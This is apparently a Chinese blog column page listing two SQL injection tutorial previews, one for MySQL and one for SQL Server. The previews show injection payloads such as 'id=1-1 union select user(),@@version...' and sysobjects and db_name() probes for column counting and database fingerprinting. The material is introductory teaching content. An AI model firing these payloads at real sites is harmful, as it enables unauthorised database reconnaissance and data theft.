sql注入漏洞
此专栏主要介绍下sql注入的一些漏洞操作
白瞳洛
这世上天才很少,懒蛋却很多,你若对得起时间,时间便对得起你!
展开
-
针对mysql的sql注入漏洞测试(MySql版)
我们先来判断下这个表中有几个字段使用 order by1以上的,如果说页面不正常了,肯定就超过这个数了,比如我们使用6来。6报错那就表述这个字段只有5个了。 id=1 order by 6# id=1-1 union select 1,2,3,4,5#--下面获取每个字段 我们换成user(),@@version数据库版本,database()当前使用的数据库,@@basedirmysql的安装路径,随后会返回一些敏感信息 id=1-1 union select user(),@@v...原创 2020-08-11 14:08:29 · 654 阅读 · 0 评论 -
针对sqlserver的sql注入漏洞(sqlsverver版)
从上往下一直走-->(下面的纯手打,注意中英文符号) id=1-1 and 1=1是否存在漏洞 id=1-1 and exists(select * from sysobjects) --判断数据库类型 id=1-1 and (select @@version)>0 --判断数据库的版本 id=1-1 and (select db_name()) --判断数据库名称 id=1-1 order by 1/....../10.... --判断字段有多少 报错(超出xxx个字段) id=...原创 2020-08-11 14:07:40 · 951 阅读 · 1 评论